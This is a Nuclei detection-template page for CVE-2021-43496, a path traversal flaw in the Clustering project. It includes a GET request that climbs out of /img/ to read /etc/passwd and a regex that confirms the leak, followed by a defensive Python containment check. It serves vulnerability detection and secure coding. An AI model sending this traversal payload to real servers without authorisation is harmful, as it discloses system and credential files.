Clustering Local File Inclusion
ID: CVE-2021-43496
Severity: high
Author: Evan Rubinstein
Tags: cve2021,cve,lfi,clustering,clustering_project
Description
Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
YAML Source
id: CVE-2021-43496

info:
  name: Clustering Local File Inclusion
  author: Evan Rubinstein
  severity: high
  description: Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
  impact: |
    This vulnerability can result in unauthorized access to sensitive files and directories, as well as the execution of arbitrary code on the affected system.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/varun-suresh/Clustering/issues/12
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43496
    - https://github.com/StarCrossPortal/scalpel
    - https://github.com/anonymous364872/Rapier_Tool
    - https://github.com/apif-review/APIF_tool_2024
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-43496
    cwe-id: CWE-22
    epss-score: 0.02502
    epss-percentile: 0.90106
    cpe: cpe:2.3:a:clustering_project:clustering:2019-07-26:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: clustering_project
    product: clustering
  tags: cve2021,cve,lfi,clustering,clustering_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/img/../../../../../../etc/passwd"

    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 490a00463044022063fa65a48dc7ed7e9ef5169b9334f027dc9ad852988f615d581da2fabf1defaf02205f684e84ba236972805eda10b0ebf0939a346fb9d99817a1a52b31473f931f6d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-43496.yaml"
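
The template's request only succeeds when the server joins the text after /img/ onto a directory without checking where the result lands. The following is an added example, not code from the Clustering project or from the template author, showing a "resolve, then verify containment" check for CWE-22; the names resolve_under, TraversalRejected and demo are hypothetical, and all files and requests are constructed in a temporary directory.

```python
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote


class TraversalRejected(ValueError):
    """The requested path resolves outside the served directory."""


def resolve_under(root: Path, requested: str) -> Path:
    """Map a URL path segment to a real file under root (hypothetical helper)."""
    # Assumption: the caller may hand over a still-encoded segment (%2e%2e%2f).
    decoded = unquote(requested)
    if "\x00" in decoded:
        raise TraversalRejected("NUL byte in path")
    root_real = root.resolve(strict=True)
    # lstrip("/") stops an absolute request from replacing root in the join.
    candidate = (root_real / decoded.lstrip("/")).resolve()
    # resolve() collapses ".." and follows symlinks, so compare real paths.
    if not candidate.is_relative_to(root_real):
        raise TraversalRejected(f"{requested!r} escapes {root_real}")
    if not candidate.is_file():
        raise FileNotFoundError(requested)
    return candidate


def demo() -> dict:
    """Run constructed requests against a temporary image directory."""
    requests = ["face.jpg", "../../../../../../etc/passwd",
                "%2e%2e%2fsecret.txt", "/etc/passwd", "link.jpg"]
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        img = base / "img"
        img.mkdir()
        (img / "face.jpg").write_bytes(b"\xff\xd8 constructed image")
        (base / "secret.txt").write_text("constructed secret")
        os.symlink(base / "secret.txt", img / "link.jpg")  # symlink escape
        for req in requests:
            try:
                resolve_under(img, req)
                results[req] = "served"
            except TraversalRejected:
                results[req] = "rejected"
            except FileNotFoundError:
                results[req] = "not found"
    return results


if __name__ == "__main__":
    for request, outcome in demo().items():
        print(f"{outcome:10} {request}")
```

The second request is the path suffix used by the template above; with the containment check in place the response body can no longer satisfy the matcher.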